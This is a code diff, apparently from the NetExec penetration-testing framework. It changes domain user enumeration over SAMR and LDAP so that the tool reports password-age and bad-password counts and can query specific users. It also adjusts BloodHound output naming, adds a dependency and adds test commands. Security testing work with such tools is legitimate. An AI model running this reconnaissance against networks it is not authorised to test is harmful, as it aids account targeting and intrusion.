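    parsed = (datetime(1601, 1, 1) + timedelta(seconds=int(pwd_last_set) / 10**7)).strftime("%Y-%m-%d %H:%M:%S")
    print(parsed)                                # 1601-01-01 00:00:00 -> displayed as "<never>" above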
@@ -851,7 +865,7 @@ class ldap(connection):
                     elif str(attribute["type"]) == "userAccountControl":
                         userAccountControl = int(attribute["vals"][0])
                         account_disabled = userAccountControl & 2
-                        if not account_disabled:
-                            self.logger.highlight(f"{sAMAccountName}")
+                if not account_disabled:
+                    self.logger.highlight(f"{sAMAccountName}")
             except Exception as e:
                 self.logger.debug(f"Skipping item, cannot process due to error {e}")
@@ -1373,15 +1387,18 @@ class ldap(connection):
             num_workers=10,
             disable_pooling=False,
             timestamp=timestamp,
+            fileNamePrefix=self.output_filename.split("/")[-1],
             computerfile=None,
             cachefile=None,
             exclude_dcs=False,
         )

+        self.output_filename += f"_{timestamp}"
+
         self.logger.highlight(f"Compressing output into {self.output_filename}bloodhound.zip")
         list_of_files = os.listdir(os.getcwd())
         with ZipFile(self.output_filename + "bloodhound.zip", "w") as z:
             for each_file in list_of_files:
-                if each_file.startswith(timestamp) and each_file.endswith("json"):
+                if each_file.startswith(self.output_filename.split("/")[-1]) and each_file.endswith("json"):
                     z.write(each_file)
                     os.remove(each_file)


@@ -44,17 +44,7 @@ class BloodHound:
         # Create an object resolver
         self.ad.create_objectresolver(self.pdc)

-    def run(
-        self,
-        collect,
-        num_workers=10,
-        disable_pooling=False,
-        timestamp="",
-        computerfile="",
-        cachefile=None,
-        exclude_dcs=False,
-    ):
+    def run(self, collect, num_workers=10, disable_pooling=False, timestamp="", fileNamePrefix="", computerfile="", cachefile=None, exclude_dcs=False):
         start_time = time.time()
         if cachefile:
             self.ad.load_cachefile(cachefile)
@@ -82,7 +72,7 @@ class BloodHound:
             )
             # Initialize enumerator
             membership_enum = MembershipEnumerator(self.ad, self.pdc, collect, disable_pooling)
-            membership_enum.enumerate_memberships(timestamp=timestamp)
+            membership_enum.enumerate_memberships(timestamp=timestamp, fileNamePrefix=fileNamePrefix)
         elif "container" in collect:
             # Fetch domains for later, computers if needed
             self.pdc.prefetch_info(
@@ -92,7 +82,7 @@ class BloodHound:
             )
             # Initialize enumerator
             membership_enum = MembershipEnumerator(self.ad, self.pdc, collect, disable_pooling)
-            membership_enum.do_container_collection(timestamp=timestamp)
+            membership_enum.do_container_collection(timestamp=timestamp, fileNamePrefix=fileNamePrefix)
         elif do_computer_enum:
             # We need to know which computers to query regardless
             # We also need the domains to have a mapping from NETBIOS -> FQDN for local admins
@@ -102,7 +92,7 @@ class BloodHound:
             self.pdc.get_domains("acl" in collect)
         if "trusts" in collect or "acl" in collect or "objectprops" in collect:
             trusts_enum = DomainEnumerator(self.ad, self.pdc)
-            trusts_enum.dump_domain(collect, timestamp=timestamp)
+            trusts_enum.dump_domain(collect, timestamp=timestamp, fileNamePrefix=fileNamePrefix)
         if do_computer_enum:
             # If we don't have a GC server, don't use it for deconflictation
             have_gc = len(self.ad.gcs()) > 0
@@ -114,7 +104,7 @@ class BloodHound:
                 computerfile=computerfile,
                 exclude_dcs=exclude_dcs,
             )
-            computer_enum.enumerate_computers(self.ad.computers, num_workers=num_workers, timestamp=timestamp)
+            computer_enum.enumerate_computers(self.ad.computers, num_workers=num_workers, timestamp=timestamp, fileNamePrefix=fileNamePrefix)
         end_time = time.time()
         minutes, seconds = divmod(int(end_time - start_time), 60)
         self.logger.highlight("Done in %02dM %02dS" % (minutes, seconds))


@@ -16,7 +16,7 @@ def proto_args(parser, std_parser, module_parser):
     vgroup.add_argument("--trusted-for-delegation", action="store_true", help="Get the list of users and computers with flag TRUSTED_FOR_DELEGATION")
     vgroup.add_argument("--password-not-required", action="store_true", help="Get the list of users with flag PASSWD_NOTREQD")
     vgroup.add_argument("--admin-count", action="store_true", help="Get objets that had the value adminCount=1")
-    vgroup.add_argument("--users", action="store_true", help="Enumerate enabled domain users")
+    vgroup.add_argument("--users", nargs="*", help="Enumerate enabled domain users")
     vgroup.add_argument("--groups", action="store_true", help="Enumerate domain groups")
     vgroup.add_argument("--dc-list", action="store_true", help="Enumerate Domain Controllers")
     vgroup.add_argument("--get-sid", action="store_true", help="Get domain sid")


@@ -189,7 +189,7 @@ class mssql(connection):
                 raise
             self.check_if_admin()
             self.logger.success(f"{self.domain}\\{self.username}{used_ccache} {self.mark_pwned()}")
-            if not self.args.local_auth:
+            if not self.args.local_auth and self.username != "":
                 add_user_bh(self.username, self.domain, self.logger, self.config)
             if self.admin_privs:
                 add_user_bh(f"{self.hostname}$", self.domain, self.logger, self.config)
@@ -222,7 +222,7 @@ class mssql(connection):
             self.check_if_admin()
             out = f"{self.domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}"
             self.logger.success(out)
-            if not self.args.local_auth:
+            if not self.args.local_auth and self.username != "":
                 add_user_bh(self.username, self.domain, self.logger, self.config)
             if self.admin_privs:
                 add_user_bh(f"{self.hostname}$", self.domain, self.logger, self.config)
@@ -261,7 +261,7 @@ class mssql(connection):
             self.check_if_admin()
             out = f"{self.domain}\\{self.username}:{process_secret(self.nthash)} {self.mark_pwned()}"
             self.logger.success(out)
-            if not self.args.local_auth:
+            if not self.args.local_auth and self.username != "":
                 add_user_bh(self.username, self.domain, self.logger, self.config)
             if self.admin_privs:
                 add_user_bh(f"{self.hostname}$", self.domain, self.logger, self.config)


@@ -243,7 +243,7 @@ class rdp(connection):
                     self.mark_pwned(),
                 )
             )
-            if not self.args.local_auth:
+            if not self.args.local_auth and self.username != "":
                 add_user_bh(username, domain, self.logger, self.config)
             if self.admin_privs:
                 add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@@ -289,7 +289,7 @@ class rdp(connection):
                 self.admin_privs = True
             self.logger.success(f"{domain}\\{username}:{process_secret(password)} {self.mark_pwned()}")
-            if not self.args.local_auth:
+            if not self.args.local_auth and self.username != "":
                 add_user_bh(username, domain, self.logger, self.config)
             if self.admin_privs:
                 add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@@ -323,7 +323,7 @@ class rdp(connection):
                 self.admin_privs = True
             self.logger.success(f"{self.domain}\\{username}:{process_secret(ntlm_hash)} {self.mark_pwned()}")
-            if not self.args.local_auth:
+            if not self.args.local_auth and self.username != "":
                 add_user_bh(username, domain, self.logger, self.config)
             if self.admin_privs:
                 add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)


@@ -317,7 +317,7 @@ class smb(connection):
             out = f"{self.domain}\\{self.username}{used_ccache} {self.mark_pwned()}"
             self.logger.success(out)
-            if not self.args.local_auth and not self.args.delegate:
+            if not self.args.local_auth and self.username != "" and not self.args.delegate:
                 add_user_bh(self.username, domain, self.logger, self.config)
             if self.admin_privs:
                 add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@@ -380,7 +380,7 @@ class smb(connection):
             out = f"{domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}"
             self.logger.success(out)
-            if not self.args.local_auth:
+            if not self.args.local_auth and self.username != "":
                 add_user_bh(self.username, self.domain, self.logger, self.config)
             if self.admin_privs:
                 self.logger.debug(f"Adding admin user: {self.domain}/{self.username}:{self.password}@{self.host}")
@@ -447,7 +447,7 @@ class smb(connection):
             out = f"{domain}\\{self.username}:{process_secret(self.hash)} {self.mark_pwned()}"
             self.logger.success(out)
-            if not self.args.local_auth:
+            if not self.args.local_auth and self.username != "":
                 add_user_bh(self.username, self.domain, self.logger, self.config)
             if self.admin_privs:
                 self.db.add_admin_user("hash", domain, self.username, nthash, self.host, user_id=user_id)
@@ -1008,8 +1008,10 @@ class smb(connection):
         return groups

     def users(self):
-        self.logger.display("Trying to dump local users with SAMRPC protocol")
-        return UserSamrDump(self).dump()
+        if len(self.args.users) > 0:
+            self.logger.debug(f"Dumping users: {', '.join(self.args.users)}")
+        return UserSamrDump(self).dump(self.args.users)

     def hosts(self):
         hosts = []


@@ -38,7 +38,7 @@ def proto_args(parser, std_parser, module_parser):
     egroup.add_argument("--disks", action="store_true", help="enumerate disks")
     egroup.add_argument("--loggedon-users-filter", action="store", help="only search for specific user, works with regex")
     egroup.add_argument("--loggedon-users", action="store_true", help="enumerate logged on users")
-    egroup.add_argument("--users", nargs="?", const="", metavar="USER", help="enumerate domain users, if a user is specified than only its information is queried.")
+    egroup.add_argument("--users", nargs="*", metavar="USER", help="enumerate domain users, if a user is specified than only its information is queried.")
     egroup.add_argument("--groups", nargs="?", const="", metavar="GROUP", help="enumerate domain groups, if a group is specified than its members are enumerated")
     egroup.add_argument("--computers", nargs="?", const="", metavar="COMPUTER", help="enumerate computer users")
     egroup.add_argument("--local-groups", nargs="?", const="", metavar="GROUP", help="enumerate local groups, if a group is specified then its members are enumerated")


@@ -4,6 +4,7 @@ from impacket.dcerpc.v5 import transport, samr
 from impacket.dcerpc.v5.rpcrt import DCERPCException
 from impacket.dcerpc.v5.rpcrt import DCERPC_v5
 from impacket.nt_errors import STATUS_MORE_ENTRIES
+from datetime import datetime, timedelta


 class UserSamrDump:
@@ -26,6 +27,8 @@ class UserSamrDump:
         self.doKerberos = connection.kerberos
         self.protocols = UserSamrDump.KNOWN_PROTOCOLS.keys()
         self.users = []
+        self.rpc_transport = None
+        self.dce = None

         if self.hash is not None:
             if self.hash.find(":") != -1:
@@ -36,46 +39,37 @@ class UserSamrDump:
         if self.password is None:
             self.password = ""

-    def dump(self):
+    def dump(self, requested_users=None):
         # Try all requested protocols until one works.
         for protocol in self.protocols:
             try:
                 protodef = UserSamrDump.KNOWN_PROTOCOLS[protocol]
                 port = protodef[1]
             except KeyError:
-                self.logger.debug(f"Invalid Protocol '{protocol}'")
+                self.logger.debug(f"Invalid Protocol: {protocol}")
             self.logger.debug(f"Trying protocol {protocol}")
-            rpctransport = transport.SMBTransport(
-                self.addr,
-                port,
-                r"\samr",
-                self.username,
-                self.password,
-                self.domain,
-                self.lmhash,
-                self.nthash,
-                self.aesKey,
-                doKerberos=self.doKerberos,
-            )
+            self.rpc_transport = transport.SMBTransport(self.addr, port, r"\samr", self.username, self.password, self.domain, self.lmhash, self.nthash, self.aesKey, doKerberos=self.doKerberos)
             try:
-                self.fetchList(rpctransport)
+                self.fetch_users(requested_users)
                 break
             except Exception as e:
-                self.logger.debug(f"Protocol failed: {e}")
+                self.logger.debug(f"Connection with protocol {protocol} failed: {e}")
         return self.users

-    def fetchList(self, rpctransport):
-        dce = DCERPC_v5(rpctransport)
-        dce.connect()
-        dce.bind(samr.MSRPC_UUID_SAMR)
+    def fetch_users(self, requested_users):
+        self.dce = DCERPC_v5(self.rpc_transport)
+        self.dce.connect()
+        self.dce.bind(samr.MSRPC_UUID_SAMR)
         # Setup Connection
-        resp = samr.hSamrConnect2(dce)
+        resp = samr.hSamrConnect2(self.dce)
         if resp["ErrorCode"] != 0:
             raise Exception("Connect error")

         resp2 = samr.hSamrEnumerateDomainsInSamServer(
-            dce,
+            self.dce,
             serverHandle=resp["ServerHandle"],
             enumerationContext=0,
             preferedMaximumLength=500,
@@ -84,7 +78,7 @@ class UserSamrDump:
             raise Exception("Connect error")

         resp3 = samr.hSamrLookupDomainInSamServer(
-            dce,
+            self.dce,
             serverHandle=resp["ServerHandle"],
             name=resp2["Buffer"]["Buffer"][0]["Name"],
         )
@@ -92,7 +86,7 @@ class UserSamrDump:
             raise Exception("Connect error")

         resp4 = samr.hSamrOpenDomain(
-            dce,
+            self.dce,
             serverHandle=resp["ServerHandle"],
             desiredAccess=samr.MAXIMUM_ALLOWED,
             domainId=resp3["DomainId"],
@@ -101,28 +95,84 @@ class UserSamrDump:
             raise Exception("Connect error")
         self.__domains = resp2["Buffer"]["Buffer"]
-        domainHandle = resp4["DomainHandle"]
+        domain_handle = resp4["DomainHandle"]
         # End Setup

-        status = STATUS_MORE_ENTRIES
-        enumerationContext = 0
-        while status == STATUS_MORE_ENTRIES:
-            try:
-                resp = samr.hSamrEnumerateUsersInDomain(dce, domainHandle, enumerationContext=enumerationContext)
-            except DCERPCException as e:
-                if str(e).find("STATUS_MORE_ENTRIES") < 0:
-                    self.logger.fail("Error enumerating domain user(s)")
-                    break
-                resp = e.get_packet()
-            self.logger.success("Enumerated domain user(s)")
-            for user in resp["Buffer"]["Buffer"]:
-                r = samr.hSamrOpenUser(dce, domainHandle, samr.MAXIMUM_ALLOWED, user["RelativeId"])
-                info_user = samr.hSamrQueryInformationUser2(dce, r["UserHandle"], samr.USER_INFORMATION_CLASS.UserAllInformation)["Buffer"]["All"]["AdminComment"]
-                self.logger.highlight(f"{self.domain}\\{user['Name']:<30} {info_user}")
-                self.users.append(user["Name"])
-                samr.hSamrCloseHandle(dce, r["UserHandle"])
-            enumerationContext = resp["EnumerationContext"]
-            status = resp["ErrorCode"]
-        dce.disconnect()
+        if requested_users:
+            self.logger.debug(f"Looping through users requested and looking up their information: {requested_users}")
+            try:
+                names_lookup_resp = samr.hSamrLookupNamesInDomain(self.dce, domain_handle, requested_users)
+                rids = [r["Data"] for r in names_lookup_resp["RelativeIds"]["Element"]]
+                self.logger.debug(f"Specific RIDs retrieved: {rids}")
+                users = self.get_user_info(domain_handle, rids)
+            except DCERPCException as e:
+                self.logger.debug(f"Exception while requesting users in domain: {e}")
+                if "STATUS_SOME_NOT_MAPPED" in str(e):
+                    # which user is not translated correctly isn't returned so we can't tell the user which is failing, which is very annoying
+                    self.logger.fail("One of the users requested does not exist in the domain, causing a critical failure during translation, re-check the users and try again")
+                else:
+                    self.logger.fail(f"Error occurred when looking up users in domain: {e}")
+        else:
+            status = STATUS_MORE_ENTRIES
+            enumerationContext = 0
+            while status == STATUS_MORE_ENTRIES:
+                try:
+                    enumerate_users_resp = samr.hSamrEnumerateUsersInDomain(self.dce, domain_handle, enumerationContext=enumerationContext)
+                except DCERPCException as e:
+                    if str(e).find("STATUS_MORE_ENTRIES") < 0:
+                        self.logger.fail("Error enumerating domain user(s)")
+                        break
+                    enumerate_users_resp = e.get_packet()
+
+                rids = [r["RelativeId"] for r in enumerate_users_resp["Buffer"]["Buffer"]]
+                self.logger.debug(f"Full domain RIDs retrieved: {rids}")
+                users = self.get_user_info(domain_handle, rids)
+
+                # set these for the while loop
+                enumerationContext = enumerate_users_resp["EnumerationContext"]
+                status = enumerate_users_resp["ErrorCode"]
+
+        self.print_user_info(users)
+        self.dce.disconnect()
+
+    def get_user_info(self, domain_handle, user_ids):
+        self.logger.debug(f"Getting user info for users: {user_ids}")
+        users = []
+
+        for user in user_ids:
+            self.logger.debug(f"Calling hSamrOpenUser for RID {user}")
+            open_user_resp = samr.hSamrOpenUser(
+                self.dce,
+                domain_handle,
+                samr.MAXIMUM_ALLOWED,
+                user
+            )
+            info_user_resp = samr.hSamrQueryInformationUser2(
+                self.dce,
+                open_user_resp["UserHandle"],
+                samr.USER_INFORMATION_CLASS.UserAllInformation
+            )["Buffer"]
+
+            user_info = info_user_resp["All"]
+            user_name = user_info["UserName"]
+            bad_pwd_count = user_info["BadPasswordCount"]
+            user_description = user_info["AdminComment"]
+            last_pw_set = old_large_int_to_datetime(user_info["PasswordLastSet"])
+            if last_pw_set == "1601-01-01 00:00:00":
+                last_pw_set = "<never>"
+            users.append({"name": user_name, "description": user_description, "bad_pwd_count": bad_pwd_count, "last_pw_set": last_pw_set})
+
+            samr.hSamrCloseHandle(self.dce, open_user_resp["UserHandle"])
+        return users
+
+    def print_user_info(self, users):
+        self.logger.highlight(f"{'-Username-':<30}{'-Last PW Set-':<20}{'-BadPW-':<8}{'-Description-':<60}")
+        for user in users:
+            self.logger.debug(f"Full user info: {user}")
+            self.logger.highlight(f"{user['name']:<30}{user['last_pw_set']:<20}{user['bad_pwd_count']:<8}{user['description']} ")
+
+
+def old_large_int_to_datetime(large_int):
+    combined = (large_int["HighPart"] << 32) | large_int["LowPart"]
+    timestamp_seconds = combined / 10**7
+    start_date = datetime(1601, 1, 1)
+    return (start_date + timedelta(seconds=timestamp_seconds)).replace(microsecond=0).strftime("%Y-%m-%d %H:%M:%S")
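A small, self-contained check of the conversion helper with a zeroed OLD_LARGE_INTEGER (the "password never set" case handled in get_user_info above); the function is copied from the diff so the snippet runs on its own, and the dict stands in for the impacket structure, which is read with the same keys:

    from datetime import datetime, timedelta

    def old_large_int_to_datetime(large_int):
        combined = (large_int["HighPart"] << 32) | large_int["LowPart"]
        timestamp_seconds = combined / 10**7
        start_date = datetime(1601, 1, 1)
        return (start_date + timedelta(seconds=timestamp_seconds)).replace(microsecond=0).strftime("%Y-%m-%d %H:%M:%S")

    print(old_large_int_to_datetime({"HighPart": 0, "LowPart": 0}))  # 1601-01-01 00:00:00 -> shown as "<never>"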


@@ -167,7 +167,7 @@ class winrm(connection):
                     self.db.add_admin_user("plaintext", domain, self.username, self.password, self.host)  # , user_id=user_id)
                     add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
-                if not self.args.local_auth:
+                if not self.args.local_auth and self.username != "":
                     add_user_bh(self.username, self.domain, self.logger, self.config)
                 return True
             except Exception as e:
@@ -210,7 +210,7 @@ class winrm(connection):
                 self.db.add_admin_user("hash", domain, self.username, nthash, self.host)
                 add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
-            if not self.args.local_auth:
+            if not self.args.local_auth and self.username != "":
                 add_user_bh(self.username, self.domain, self.logger, self.config)
             return True

poetry.lock (generated, 16 lines changed)

@@ -1826,6 +1826,20 @@ tomli = {version = ">=1.0.0", markers = "python_version < \"3.11\""}
 [package.extras]
 testing = ["argcomplete", "attrs (>=19.2.0)", "hypothesis (>=3.56)", "mock", "nose", "pygments (>=2.7.2)", "requests", "setuptools", "xmlschema"]

+[[package]]
+name = "python-dateutil"
+version = "2.9.0.post0"
+description = "Extensions to the standard Python datetime module"
+optional = false
+python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,>=2.7"
+files = [
+    {file = "python-dateutil-2.9.0.post0.tar.gz", hash = "sha256:37dd54208da7e1cd875388217d5e00ebd4179249f90fb72437e91a35459a0ad3"},
+    {file = "python_dateutil-2.9.0.post0-py2.py3-none-any.whl", hash = "sha256:a8b2bc7bffae282281c8140a97d3aa9c14da0b136dfe83f850eea9a5f7470427"},
+]
+
+[package.dependencies]
+six = ">=1.5"
+
 [[package]]
 name = "python-libnmap"
 version = "0.7.3"
@@ -2293,4 +2307,4 @@ testing = ["big-O", "jaraco.functools", "jaraco.itertools", "more-itertools", "p
 [metadata]
 lock-version = "2.0"
 python-versions = "^3.8.0"
-content-hash = "19dfeaa2fa332997fb149a591b147061c8da77e2f69b8734d7f988562231a4e7"
+content-hash = "0bbd6a14b3478776b71e58b674942a5053c24fd2f802cc45ccd968f205a80167"


@@ -63,6 +63,7 @@ rich = "^13.3.5"
 python-libnmap = "^0.7.3"
 oscrypto = { git = "https://github.com/Pennyw0rth/oscrypto" }  # Pypi version currently broken, see: https://github.com/wbond/oscrypto/issues/78 (as of 9/23)
 argcomplete = "^3.1.4"
+python-dateutil = ">=2.8.2"

 [tool.poetry.group.dev.dependencies]
 flake8 = "*"


@@ -183,6 +183,8 @@ netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M user-de
 netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M user-desc --options
 netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M whoami
 netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M whoami --options
+netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M pso
+netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M pso --options

 ##### WINRM
 netexec winrm TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS  # need an extra space after this command due to regex
 netexec winrm TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X whoami